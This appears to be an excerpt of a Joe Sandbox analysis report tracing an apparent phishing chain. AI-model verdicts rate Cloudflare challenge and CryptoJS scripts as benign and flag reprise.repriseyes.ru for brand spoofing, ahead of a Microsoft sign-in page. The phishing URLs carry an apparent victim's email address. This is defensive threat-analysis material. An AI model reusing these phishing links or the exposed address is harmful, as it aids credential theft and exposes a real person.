"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script does not contain any high-risk indicators, and the behaviors observed are typical of a Cloudflare challenge script, such as handling translations and providing a user interface for the challenge. While the script uses some legacy APIs like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a legitimate security mechanism and does not pose a significant security risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F"},"translations":{"testing_only_always_pass":"Testing%20only%2C%20always%20pass.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_failure":"Error","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","testing_only":"Testing%20only.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_verifying":"Verifying...","turnstile_overrun_description":"Stuck%20here%3F","turnstile_success":"Success%21","turnstile_timeout":"Timed%20out","turnstile_footer_privacy":"Privacy","turnstile_footer_terms":"Terms","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_expired":"Expired","turnstile_feedback_description":"Send%20Feedback","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_refresh":"Refresh","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20are%20human","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eR,eU,eV,fl,fm,fq,fr,fy,fC,fF,fI,fK,fL,fM,fY,ga,gg,gh,gi,gs,gD,gH,eS,eT){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(621))/1*(parseInt(gI(541))/2)+-parseInt(gI(1126))/3+parseInt(gI(947))/4*(parseInt(gI(421))/5)+-parseInt(gI(704))/6+parseInt(gI(1144))/7*(-parseInt(gI(590))/8)+-parseInt(gI(351))/9+parseInt(gI(824))/10*(-parseInt(gI(367))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,185968),eM=this||self,eN=eM[gJ(910)],eM[gJ(1422)]=function(c,gT,e,i,j,k){e=(gT=gJ,{'eOjLh':function(g,h){return g<h},'sQkqF':function(g,h){return g>>h},'RTqGS':function(g,h){return h&g},'ICuFG':function(g,h){return g(h)}});try{return e[gT(1383)](eQ,c)}catch(g){if(gT(1441)!==gT(1441)){for(l=m[gT(1294)](/\r\n/g,'\n'),i='',j=0;e[gT(439)](j,n[gT(256)]);k=D[gT(1043)](j),128>k?i+=E[gT(240)](k):(127<k&&2048>k?i+=F[gT(240)](192.46|k>>6):(i+=G[gT(240)](k>>12|224.57),i+=H[gT(240)](e[gT(729)](k,6)&63.98|128.6)),i+=I[gT(240)](e[gT(745)](k,63)|128)),j++);return i}else return eO(eP(c))}},eR=function(gU,d,e,f,g){return gU=gJ,d={'vArps':gU(944),'vBhfE':function(h,i){return i==h},'IUrRN':function(h,i){return h+i},'ZYIyJ':function(h,i){return h(i)},'EhYpl':function(h,i){return h<<i},'mVGym':function(h,i){return h-i},'eEUjn':function(h,i){return h<i},'szSfU':function(h,i){return h|i},'RsoWI':function(h,i){return i&h},'qvrIR':function(h,i){return h-i},'GbuCy':function(h,i){return i|h},'Ndpqu':function(h,i){return h(i)},'gNxRa':function(h,i){return h>i},'HUZsA':function(h,i){return h>i},'YAwye':function(h,i){return h<<i},'ofTJp':function(h,i){return h==i},'VAmPr':function(h,i){return h<i},'WJSWA':functio |
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on implementing various cryptographic primitives and utilities, which are common in legitimate applications. While the code uses some legacy practices like the `XDomainRequest` API, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a benign implementation of cryptographic functionality and poses a low risk."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Complete the security check to confirm you are not a bot. This helps protect our organization from threats and spam.",
"prominent_button_name": "Drag the slider to complete the captcha",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://reprise.repriseyes.ru Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://reprise.repriseyes.ru |
| URL: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29t Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script does not exhibit any high-risk or moderate-risk behaviors. It primarily consists of utility functions and error handling, with no indication of malicious intent or data exfiltration. The code appears to be part of a larger library or framework, possibly for handling asynchronous operations or managing errors."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.microsoftonline.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.microsoftonline.com |
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2F Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://microsoftonline.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://microsoftonline.com |
Edit tour
Acrobat.exe (PID: 7080 cmdline: 
AcroCEF.exe (PID: 6396 cmdline: 
chrome.exe (PID: 7600 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node